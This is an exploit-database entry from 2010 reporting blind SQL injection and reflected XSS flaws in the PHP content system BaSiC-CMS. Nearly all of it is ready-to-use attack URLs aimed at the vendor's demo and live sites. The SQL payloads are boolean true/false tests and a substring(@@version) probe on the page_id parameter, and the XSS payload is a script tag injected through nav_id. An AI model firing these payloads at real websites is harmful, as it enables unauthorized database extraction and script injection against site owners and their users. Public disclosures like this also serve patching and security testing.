BaSiC-CMS Script (SQL Blind/XSS) Multiple Remote Vulnerabilities

2010-02-12T00:00:00
ID 1337DAY-ID-10867
Type zdt
Reporter Red-D3v1L
Modified 2010-02-12T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ================================================================
BaSiC-CMS Script (SQL Blind/XSS) Multiple Remote Vulnerabilities
================================================================

    [?] Script:               [ BaSiC-CMS ]
    [?] Home Scirpt           [ http://www.basic-cms.de/ ]
    [?] Language:             [ PHP ]
    [?] Founder:              [ Red-D3v1L ]

########################################################################
   
===[ Exploit SQL Blind ]===

   
[ ] Exploit : index.php?r=&page_id=[Blind]


http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=1 << this true

http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%201=0 << this faulse


http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%[email protected]@version,1,1%29=4  << this true


http://demo.basic-cms.de/pages/index.php?r=&page_id=74%20and%20substring%[email protected]@version,1,1%29=5 << this faulse


===[ Exploit XSS ]===


index.php?&nav_id=[XSS Code]


http://www.basic-cms.de/pages/index.php?&nav_id=%22%3E%3Cscript%3Ealert%281%29;%3C/script%3E


./Greetz For All my Frindes
==============================================================================



#  0day.today [2018-03-28]  #